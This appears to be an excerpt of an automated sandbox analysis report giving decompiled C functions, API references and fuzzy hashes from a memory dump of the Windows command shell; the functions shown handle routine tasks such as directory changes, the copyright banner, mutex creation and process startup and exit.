0x001cc0eb
0x00000000
0x001bee46
0x001bee46
0x001cc0df
0x001cc0e2
0x001cc0e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001cc0e5
0x001bee51
0x00000000
0x001bee57
0x001bee59
0x001bee59
0x001bee51
0x001bee40
0x001bee5b
0x001bee5d
0x001bee64
0x001bee67
0x001bee69
0x001bee99
0x001bee99
0x001bee6b
0x001bee7a
0x001bee7c
0x001bee80
0x001bee84
0x001bee8b
0x00000000
0x001bee8d
0x001bee8d
0x001bee90
0x001bee91
0x001bee94
0x001bee97
0x00000000
0x00000000
0x00000000
0x00000000
0x001bee97
0x00000000
0x001bee8b
0x001beea0
0x00000000
0x00000000
0x001beea0
0x001beea2
0x001beea2
0x001beea7
0x001beea7
0x001beeaa
0x001beda4
0x001bedbc
0x001bede9
0x001bedec
0x001bedf4
0x00000000
0x00000000
0x00000000
0x001bedbe
0x001bedbe
0x001bedca
0x001beeb2
0x001beeb4
0x001beeb4
0x001beeb4
0x001beeb7
0x001beeb9
0x001beebc
0x001beec0
0x00000000
0x001bedd0
0x001bedd5
0x00000000
0x001bedd5
0x001bedca
0x00000000
0x001bedbc
0x001bedde
0x001bede8
0x00000000
0x001bede8
0x001cc0f7
0x001cc103
0x001cc109
0x001cc111
0x001cc117
0x001cc117
0x001befea
0x001befef
0x001cc125
0x001cc125
0x001beff5
0x001beffb
0x00000000
0x001beffb
0x001bebcb
0x001bebce
0x001bebcf
0x001bebd2
0x001bebdb
0x001bebdb
0x00000000
0x001bebc5
0x001be9d9
0x001be9d9
0x001be9df
0x001be9e4
0x001be9ec
0x001bea31
0x00000000
0x001bea33
0x001be9ee
0x001be9f8
0x001be9fa
0x001bea00
0x001bea07
0x001bea0e
0x00000000
0x001bea10
0x001bea10
0x001bea13
0x001bea16
0x001bea19
0x00000000
0x001bea1b
0x001bea1b
0x001bea1b
0x001bea1b
0x001bea19
0x001bea24
0x001bea26
0x00000000
0x001bea26
0x001bea22
0x00000000
0x00000000
0x00000000
0x001bea22
0x001be9ec
0x001bea29
0x001bea2e
0x001bea2e
0x001be9d3
0x00000000

APIs

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

wcschr.MSVCRT ref: 001BEB6D
iswspace.MSVCRT ref: 001BEC37
wcschr.MSVCRT ref: 001BEC4F
longjmp.MSVCRT(001EB8B8,00000001,?,00000000,?,001BED9F,?,00000000,?), ref: 001CC024
longjmp.MSVCRT(001EB8B8,00000001), ref: 001CC036
longjmp.MSVCRT(001EB8B8,00000001,00000000,?,?), ref: 001CC049
longjmp.MSVCRT(001EB8B8,00000001), ref: 001CC05B

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: longjmp$Heapwcschr$AllocProcessiswspace
String ID:
API String ID: 2511250921-0
Opcode ID: 5c542d993f70873e70b51b54d6dc740d0fd2c594716822d01167cec62a219a95
Instruction ID: b2e8ed794d599afbf70444c99aa564e2a8f1bc28d0d9e2eda145d6e1be7ce921
Opcode Fuzzy Hash: 5c542d993f70873e70b51b54d6dc740d0fd2c594716822d01167cec62a219a95
Instruction Fuzzy Hash: D141E031600211CAEB346F64D985BFA77E9EFA0301F14456EF846AB291EF708C84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D93E2 Relevance: 10.6, APIs: 7, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E001D93E2(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				int _v36;
				char _v40;
				signed int _v44;
				void _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				short _t51;
				short _t53;
				void* _t58;
				void* _t59;
				WCHAR* _t61;
				int _t62;
				short* _t75;
				void* _t76;
				short _t77;
				int _t86;
				void* _t87;
				void* _t89;
				void* _t90;
				WCHAR* _t91;
				signed int _t96;

				_t83 = __edx;
				_t68 = _t96;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t96 + 4));
				_t94 = (_t96 & 0xfffffff8) + 4;
				_t39 =  *0x1dd0b4; // 0xea614d48
				_v16 = _t39 ^ (_t96 & 0xfffffff8) + 0x00000004;
				_v40 = 1;
				_t86 = 0;
				_v36 = 0x104;
				_v44 = _v44 & 0;
				_t89 = __ecx;
				memset( &_v564, 0, 0x104);
				if(E001C0C70( &_v564, ((0 | _v40 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L23:
					__imp__??_V@YAXPAX@Z(_v44);
					_pop(_t87);
					_pop(_t90);
					return E001C6FD0(_t49, _t68, _v16 ^ _t94, _t83, _t87, _t90);
				}
				_t51 = 0x3d;
				_v24 = _t51;
				_v22 = _t89 + 0x40;
				_t53 = 0x3a;
				_v20 = _t53;
				_v18 = 0;
				_t91 = E001BCFBC( &_v24);
				if(_t91 == 0) {
					L4:
					_t75 = _v44;
					if(_t75 == 0) {
						_t75 =  &_v564;
					}
					 *_t75 = _v22;
					_t76 = _v44;
					if(_t76 == 0) {
						_t76 =  &_v564;
					}
					 *((short*)(_t76 + 2)) = _v20;
					_t58 = _v44;
					if(_t58 == 0) {
						_t58 =  &_v564;
					}
					_t77 = 0x5c;
					 *((short*)(_t58 + 4)) = _t77;
					_t59 = _v44;
					if(_t59 == 0) {
						_t59 =  &_v564;
					}
					 *((short*)(_t59 + 6)) = 0;
					_t84 = _v44;
					if(_v44 == 0) {
						_t84 =  &_v564;
					}
					_t79 =  &_v24;
					E001C3A50( &_v24, _t84);
					_t61 = _v44;
					if(_t61 == 0) {
						_t61 =  &_v564;
					}
					_t62 = SetCurrentDirectoryW(_t61);
					if(_t62 == 0) {
						_push(_t62);
						_push(GetLastError());
						E001BC5A2(_t79);
					}
					if(_t91 != 0) {
						SetErrorMode(_t86);
					}
					L20:
					_t80 =  *0x1f3cb8;
					if( *0x1f3cb8 == 0) {
						_t80 = 0x1f3ab0;
					}
					_t83 =  *0x1f3cc0;
					_t49 = E001C36CB(_t68, _t80,  *0x1f3cc0, 0);
					goto L23;
				}
				if(SetCurrentDirectoryW(_t91) != 0) {
					goto L20;
				}
				_t86 = SetErrorMode(1);
				goto L4;
			}

0x001d93e2
0x001d93e5
0x001d93e7
0x001d93e8
0x001d93f3
0x001d93f7
0x001d93ff
0x001d9406
0x001d9410
0x001d9415
0x001d9417
0x001d941a
0x001d9425
0x001d9427
0x001d9450
0x001d954b
0x001d954e
0x001d9558
0x001d955b
0x001d9567
0x001d9567
0x001d9458
0x001d9459
0x001d9463
0x001d9469
0x001d946a
0x001d9470
0x001d9479
0x001d947d
0x001d9498
0x001d9498
0x001d949d
0x001d949f
0x001d949f
0x001d94a9
0x001d94ac
0x001d94b1
0x001d94b3
0x001d94b3
0x001d94bd
0x001d94c1
0x001d94c6
0x001d94c8
0x001d94c8
0x001d94d0
0x001d94d1
0x001d94d5
0x001d94da
0x001d94dc
0x001d94dc
0x001d94e4
0x001d94e8
0x001d94ed
0x001d94ef
0x001d94ef
0x001d94f5
0x001d94f8
0x001d94fd
0x001d9502
0x001d9504
0x001d9504
0x001d950b
0x001d9513
0x001d9515
0x001d951c
0x001d951d
0x001d9523
0x001d9526
0x001d9529
0x001d9529
0x001d952f
0x001d952f
0x001d9537
0x001d9539
0x001d9539
0x001d953e
0x001d9546
0x00000000
0x001d9546
0x001d9488
0x00000000
0x00000000
0x001d9496
0x00000000

APIs

memset.MSVCRT ref: 001D9427

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

??_V@YAXPAX@Z.MSVCRT ref: 001D954E

Part of subcall function 001BCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001DF830,00002000,?,?,?,?,?,001C373A,001B590A,00000000), ref: 001BCFDF

SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 001D9480
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 001D9490
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 001D950B
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 001D9516
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 001D9529

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
String ID:
API String ID: 920682188-0
Opcode ID: dfbd38d202f8d7428aaf321e0758a23662c8cf03964c6dd46bb5657e0cd89557
Instruction ID: 4c8433da93e0694439e4df90c74bb5db5680f3355c3c7fdc1ed6128ce8e1521f
Opcode Fuzzy Hash: dfbd38d202f8d7428aaf321e0758a23662c8cf03964c6dd46bb5657e0cd89557
Instruction Fuzzy Hash: A641A231A01218ABDF14DFA5EC45BEEB3B4EF58714F0041AEE809E7250EB34DA85CB55

Uniqueness

Uniqueness Score: -1.00%

Function 001D6456 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 125
memoryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E001D6456(void* __eflags) {
				signed int _v8;
				char _v68;
				void* _v72;
				signed int _v76;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t28;
				signed int _t30;
				void _t31;
				signed int _t36;
				void* _t38;
				short _t39;
				short _t40;
				signed int _t41;
				signed int _t43;
				signed int _t44;
				void* _t46;
				signed int _t47;
				signed int _t49;
				void* _t53;
				signed int _t56;
				short* _t57;
				signed int _t58;
				void* _t59;
				void* _t60;
				signed int _t61;
				signed int _t65;
				void* _t66;
				signed int _t70;

				_t21 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t21 ^ _t70;
				_t49 = 0xe;
				_t67 = "Copyright (c) Microsoft Corporation. All rights reserved.";
				memcpy( &_v68, "Copyright (c) Microsoft Corporation. All rights reserved.", _t49 << 2);
				asm("movsw");
				_t65 = 0;
				_t47 = 0;
				if(E001C7735(0) == 0) {
					if(RtlCreateUnicodeStringFromAsciiz( &_v84,  &_v68) == 0) {
						goto L26;
					} else {
						_t67 = _v80;
						_v72 = _t67;
						goto L4;
					}
				} else {
					_t46 =  *0x1fc000(L"%WINDOWS_COPYRIGHT%");
					_t67 = _t46;
					_v72 = _t46;
					L4:
					if(_t67 == 0) {
						L26:
						_t28 = 0;
					} else {
						_t30 =  *_t67 & 0x0000ffff;
						_t60 = _t67;
						if(_t30 != 0) {
							_t58 = _t30;
							do {
								if(_t58 == 0xae || _t58 == 0xa9) {
									_t43 = 1;
								} else {
									_t43 = _t65;
								}
								_t60 = _t60 + 2;
								_t47 = _t47 + _t43;
								_t44 =  *_t60 & 0x0000ffff;
								_t58 = _t44;
							} while (_t44 != 0);
							_t67 = _v72;
						}
						_t53 = _t67;
						_t59 = _t53 + 2;
						do {
							_t31 =  *_t53;
							_t53 = _t53 + 2;
						} while (_t31 != _t65);
						_t47 = GlobalAlloc(0x40, 2 + ((_t53 - _t59 >> 1) + _t47 * 2) * 2);
						_v76 = _t47;
						if(_t47 != 0) {
							_t36 =  *_t67 & 0x0000ffff;
							_t66 = _t67;
							_t56 = _t47;
							if(_t36 != 0) {
								_t61 = _t36;
								do {
									if(_t61 == 0xae || _t61 == 0xa9) {
										_t38 = 0x28;
										 *_t56 = _t38;
										_t39 = 0x63;
										 *((short*)(_t56 + 2)) = _t39;
										_t57 = _t56 + 4;
										_t40 = 0x29;
										 *_t57 = _t40;
									} else {
										 *_t56 = _t61;
									}
									_t66 = _t66 + 2;
									_t56 = _t57 + 2;
									_t41 =  *_t66 & 0x0000ffff;
									_t61 = _t41;
								} while (_t41 != 0);
								_t67 = _v72;
								_t47 = _v76;
							}
							_t65 = _t47;
							 *_t56 = 0;
						}
						GlobalFree(_t67);
						_t28 = _t65;
					}
				}
				return E001C6FD0(_t28, _t47, _v8 ^ _t70, _t59, _t65, _t67);
			}

0x001d645e
0x001d6465
0x001d646d
0x001d646e
0x001d6476
0x001d6478
0x001d647a
0x001d647c
0x001d6485
0x001d64a9
0x00000000
0x001d64af
0x001d64af
0x001d64b2
0x00000000
0x001d64b2
0x001d6487
0x001d648c
0x001d6492
0x001d6494
0x001d64b5
0x001d64b7
0x001d6589
0x001d6589
0x001d64bd
0x001d64bd
0x001d64c0
0x001d64c5
0x001d64c7
0x001d64ce
0x001d64d1
0x001d64e3
0x001d64dd
0x001d64dd
0x001d64dd
0x001d64e4
0x001d64e7
0x001d64e9
0x001d64ec
0x001d64ee
0x001d64f3
0x001d64f3
0x001d64f6
0x001d64f8
0x001d64fb
0x001d64fb
0x001d64fe
0x001d6501
0x001d651d
0x001d651f
0x001d6524
0x001d6526
0x001d6529
0x001d652b
0x001d6530
0x001d6537
0x001d653c
0x001d653f
0x001d654d
0x001d654e
0x001d6553
0x001d6554
0x001d6558
0x001d655d
0x001d655e
0x001d6546
0x001d6546
0x001d6546
0x001d6561
0x001d6564
0x001d6567
0x001d656a
0x001d656c
0x001d6571
0x001d6574
0x001d6574
0x001d6579
0x001d657b
0x001d657b
0x001d657f
0x001d6585
0x001d6585
0x001d64b7
0x001d659b

APIs

RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 001D64A1
GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 001D6517
GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 001D657F

Strings

@PTw, xrefs: 001D6517
%WINDOWS_COPYRIGHT%, xrefs: 001D6487

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Global$AllocAsciizCreateFreeFromStringUnicode
API String ID: 1103618819-3044752458
Opcode ID: b5b900b662c9fb92e0317d8393c04e722102964c9d0bf87f60d82700aaada69a
Instruction ID: cad6525adc6db24a0a778d9bb2a17aefdf36c056416b2deb9224557b0d78602a
Opcode Fuzzy Hash: b5b900b662c9fb92e0317d8393c04e722102964c9d0bf87f60d82700aaada69a
Instruction Fuzzy Hash: AC41F336A002158BCF20DFA8A8507BA73B5EF98750F69006BE945EB354EB75DD83C390

Uniqueness

Uniqueness Score: -1.00%

Function 001D17B6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E001D17B6(char* __ecx, signed int* __edx) {
				intOrPtr _v0;
				signed int _v8;
				char _v528;
				void* _v532;
				signed int _v536;
				void* _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t25;
				void* _t29;
				signed int* _t39;
				char* _t40;
				void* _t54;
				signed int _t55;
				signed int _t57;

				_t40 = __ecx;
				_t20 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t20 ^ _t57;
				_t39 = __edx;
				 *((intOrPtr*)(__edx)) = 0;
				E001C274C( &_v528, 0x104, L"Local\\SM0:%d:%d:%hs", GetCurrentProcessId());
				_t25 =  &_v528;
				__imp__CreateMutexExW(0, _t25, 0, 0x1f0001, 0x40, __ecx);
				_t54 = _t25;
				_v532 = _t54;
				if(_t54 != 0) {
					E001D2D6D( &_v532,  &_v540);
					_t49 =  &_v536;
					_v536 = 0;
					_t55 = 0;
					_t53 = E001D1578( &_v528,  &_v536,  &_v532);
					if(_t53 >= 0) {
						_t55 = _v536 << 2;
						_t53 = 0;
					} else {
						_push(_t53);
						_push("wil");
						_t49 = 0x6a;
						E001D292C();
					}
					if(_t53 >= 0) {
						if(_t55 == 0) {
							L14:
							_t49 =  &_v532;
							_t40 =  &_v528;
							_t29 = E001D250A(_t40,  &_v532, _t53, _t39);
							_t53 = _t29;
							if(_t29 >= 0) {
								goto L9;
							} else {
								_t49 = 0x129;
								goto L16;
							}
							goto L18;
						} else {
							 *_t39 = _t55;
							_t40 =  *_t55 + 1;
							 *( *_t39) = _t40;
							L9:
							_t53 = 0;
						}
					} else {
						_t49 = 0x121;
						L16:
						_t40 = _v0;
						E001D292C("wil", _t53);
					}
					if(_v540 != 0 && ReleaseMutex(_v540) == 0) {
						_push(_t40);
						L13:
						E001D2D56();
						goto L14;
					}
					_t54 = _v532;
				} else {
					_t53 = E001D1EBE(_t40);
				}
				L18:
				if(_t54 != 0 && CloseHandle(_t54) == 0) {
					_push(_t40);
					goto L13;
				}
				return E001C6FD0(_t53, _t39, _v8 ^ _t57, _t49, _t53, _t54);
			}

0x001d17b6
0x001d17c1
0x001d17c8
0x001d17ce
0x001d17d5
0x001d17ef
0x001d17f7
0x001d1805
0x001d180b
0x001d180d
0x001d1815
0x001d1833
0x001d1839
0x001d183f
0x001d184b
0x001d1852
0x001d1856
0x001d1871
0x001d1874
0x001d1858
0x001d185b
0x001d185c
0x001d1863
0x001d1864
0x001d1864
0x001d1878
0x001d1883
0x001d18b7
0x001d18b8
0x001d18be
0x001d18c4
0x001d18c9
0x001d18cd
0x00000000
0x001d18cf
0x001d18cf
0x00000000
0x001d18cf
0x00000000
0x001d1885
0x001d1885
0x001d188b
0x001d188c
0x001d188e
0x001d188e
0x001d188e
0x001d187a
0x001d187a
0x001d18d4
0x001d18d4
0x001d18dd
0x001d18dd
0x001d1897
0x001d18a9
0x001d18af
0x001d18b2
0x00000000
0x001d18b2
0x001d18e4
0x001d1817
0x001d181c
0x001d181c
0x001d18ea
0x001d18ec
0x001d18f9
0x00000000
0x001d18fa
0x001d1913

APIs

GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 001D17D7
CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 001D1805
ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,wil,00000000,?,?,?,?), ref: 001D189F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?), ref: 001D18EF

Strings

wil, xrefs: 001D185C, 001D18D8
Local\SM0:%d:%d:%hs, xrefs: 001D17DE

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Mutex$CloseCreateCurrentHandleProcessRelease
String ID: Local\SM0:%d:%d:%hs$wil
API String ID: 3048291649-2303653343
Opcode ID: 09d03380c2e273c98aceabbdb0edd7e836e1d1265963a6dc979586b7ac0f1d24
Instruction ID: 33c7e60c56949956a9dde466b6b9aecf35faa7659f13311f1dd442ed34256606
Opcode Fuzzy Hash: 09d03380c2e273c98aceabbdb0edd7e836e1d1265963a6dc979586b7ac0f1d24
Instruction Fuzzy Hash: D331F572A40228BBCB25EB54DC89FEA7376ABA0700F11419AF819A7341DB709E41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001C6E03 Relevance: 10.6, APIs: 7, Instructions: 99
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E001C6E03(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t10;
				intOrPtr _t14;
				intOrPtr _t20;
				intOrPtr* _t21;
				int _t34;
				intOrPtr _t36;
				int _t38;
				void* _t40;
				void* _t47;
				void* _t48;

				_push(0x10);
				_push(0x1dbe78);
				E001C75CC(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t40 - 4)) = 0;
				_t36 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t34 = 0;
				while(1) {
					_t20 = _t36;
					_t10 = 0;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t36) {
						Sleep(0x3e8);
						continue;
					} else {
						_t38 = 1;
						_t34 = 1;
					}
					L6:
					_t47 =  *0x1dd514 - _t38; // 0x0
					if(_t47 != 0) {
						__eflags =  *0x1dd514; // 0x0
						if(__eflags != 0) {
							 *0x1dd19c = _t38;
							goto L12;
						} else {
							 *0x1dd514 = _t38;
							_t10 = E001C6F72(_t20, 0x1b1c04, 0x1b1c10);
							__eflags = _t10;
							if(__eflags == 0) {
								goto L12;
							} else {
								 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
								goto L24;
							}
						}
					} else {
						_push(0x1f);
						L001C73C4();
						L12:
						_t48 =  *0x1dd514 - _t38; // 0x0
						if(_t48 == 0) {
							_push(0x1b1c00);
							_push(0x1b1bd8);
							L001C75C6();
							 *0x1dd514 = 2;
						}
						if(_t34 == 0) {
							_t10 =  *0x1dd510;
							 *0x1dd510 = 0;
						}
						_t51 =  *0x1dd520;
						if( *0x1dd520 != 0) {
							_t10 = E001C7420(_t51, 0x1dd520);
							if(_t10 != 0) {
								_t38 =  *0x1dd520; // 0x0
								 *0x1f94b4(0, 2, 0);
								_t10 =  *_t38();
							}
						}
						_push( *0x1dd1a8);
						_push( *0x1dd1a4);
						_push( *0x1dd1a0);
						E001C44FC();
						 *0x1dd198 = _t10;
						if( *0x1dd1b0 != 0) {
							__eflags =  *0x1dd19c;
							if( *0x1dd19c == 0) {
								__imp___cexit();
							}
							 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
							L24:
							return E001C7614(0, _t34, _t38);
						} else {
							exit(_t10);
							_t21 =  *((intOrPtr*)(_t40 - 0x14));
							_t14 =  *((intOrPtr*)( *_t21));
							 *((intOrPtr*)(_t40 - 0x20)) = _t14;
							_push(_t21);
							_push(_t14);
							L001C731E();
							return _t14;
						}
					}
				}
				_t38 = 1;
				__eflags = 1;
				goto L6;
			}

0x001c6e03
0x001c6e05
0x001c6e0a
0x001c6e11
0x001c6e1a
0x001c6e1d
0x001c6e1f
0x001c6e24
0x001c6e26
0x001c6e28
0x001c6e2e
0x00000000
0x00000000
0x001c6e32
0x001c6e40
0x00000000
0x001c6e34
0x001c6e36
0x001c6e37
0x001c6e37
0x001c6e4b
0x001c6e4b
0x001c6e51
0x001c6e5d
0x001c6e63
0x001c6e91
0x00000000
0x001c6e65
0x001c6e65
0x001c6e75
0x001c6e7c
0x001c6e7e
0x00000000
0x001c6e80
0x001c6e80
0x00000000
0x001c6e87
0x001c6e7e
0x001c6e53
0x001c6e53
0x001c6e55
0x001c6e97
0x001c6e97
0x001c6e9d
0x001c6e9f
0x001c6ea4
0x001c6ea9
0x001c6eb0
0x001c6eb0
0x001c6ebc
0x001c6ec5
0x001c6ec5
0x001c6ec5
0x001c6ec7
0x001c6ece
0x001c6ed5
0x001c6edd
0x001c6ee3
0x001c6eeb
0x001c6ef1
0x001c6ef1
0x001c6edd
0x001c6ef3
0x001c6ef9
0x001c6eff
0x001c6f05
0x001c6f0d
0x001c6f19
0x001c6f51
0x001c6f58
0x001c6f5a
0x001c6f60
0x001c6f65
0x001c6f6c
0x001c6f71
0x001c6f1b
0x001c6f1c
0x001c6f22
0x001c6f27
0x001c6f29
0x001c6f2c
0x001c6f2d
0x001c6f2e
0x001c6f35
0x001c6f35
0x001c6f19
0x001c6e51
0x001c6e4a
0x001c6e4a
0x00000000

APIs

Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,001DBE78,00000010), ref: 001C6E40
_amsg_exit.MSVCRT ref: 001C6E55
_initterm.MSVCRT ref: 001C6EA9
__IsNonwritableInCurrentImage.LIBCMT ref: 001C6ED5
exit.MSVCRT ref: 001C6F1C
_XcptFilter.MSVCRT ref: 001C6F2E

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
String ID:
API String ID: 796493780-0
Opcode ID: af58ffe5dc3e6dd8c7151d3d62342da4502cf7c324d90560507dcd213b2c8afb
Instruction ID: af3af3bdcd180657ee836474af369e1a10395a5b42f59e73b1ab89d9464d0723
Opcode Fuzzy Hash: af58ffe5dc3e6dd8c7151d3d62342da4502cf7c324d90560507dcd213b2c8afb
Instruction Fuzzy Hash: 2E31D0755862119FDB25EB68FD15F6A3BB4FB28724F10022FE50197AE0DB70C980CA91

Uniqueness

Uniqueness Score: -1.00%

Function 001C4C3E Relevance: 10.5, APIs: 7, Instructions: 42
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E001C4C3E() {
				long _v8;
				int _t8;
				void* _t15;
				void* _t18;

				_push(_t15);
				_v8 = _v8 | 0xffffffff;
				_t18 = _t15;
				 *0x1dd0db = 0;
				WaitForSingleObject(_t18, 0xffffffff);
				_t8 = GetExitCodeProcess(_t18,  &_v8);
				if(_v8 == 0xc000013a) {
					EnterCriticalSection( *0x1e3858);
					 *0x1dd544 = 1;
					LeaveCriticalSection( *0x1e3858);
					fflush(E001C7721(fprintf(E001C7721(_t8, 2), "^C"), 2));
				}
				 *0x1dd0db = 1;
				CloseHandle(_t18);
				return _v8;
			}

0x001c4c43
0x001c4c44
0x001c4c49
0x001c4c4b
0x001c4c55
0x001c4c60
0x001c4c6d
0x001cee57
0x001cee63
0x001cee6d
0x001cee8f
0x001cee95
0x001c4c74
0x001c4c7b
0x001c4c88

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,?,001D7929,00000000,001D9313,00000000,00000000,?,001C9814,00000000), ref: 001C4C55
GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,001D7929,00000000,001D9313,00000000,00000000,?,001C9814,00000000), ref: 001C4C60
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,001D7929,00000000,001D9313,00000000,00000000,?,001C9814,00000000), ref: 001C4C7B
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001D7929,00000000,001D9313,00000000,00000000,?,001C9814,00000000), ref: 001CEE57
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001D7929,00000000,001D9313,00000000,00000000,?,001C9814,00000000), ref: 001CEE6D
fprintf.MSVCRT ref: 001CEE81
fflush.MSVCRT ref: 001CEE8F

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
String ID:
API String ID: 4271573189-0
Opcode ID: bd5895af618ab8aa26baedb85519e8b6f8ea754809e6b343acf4d7fe7882b124
Instruction ID: ebcb4451373c01901076b23e0f6cb5ba9d90556375e8369896264296da854360
Opcode Fuzzy Hash: bd5895af618ab8aa26baedb85519e8b6f8ea754809e6b343acf4d7fe7882b124
Instruction Fuzzy Hash: 86018F31406244FFDB00BBA8BC0DFAD7BACEB05321F10024AF425929F1CBB04A80CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001C07C0 Relevance: 9.4, APIs: 6, Instructions: 361
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E001C07C0(void* __ebx, long __ecx, intOrPtr _a4) {
				intOrPtr _v0;
				void* _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				short _v564;
				char _v576;
				char* _v580;
				char _v1100;
				void* _v1104;
				long _v1108;
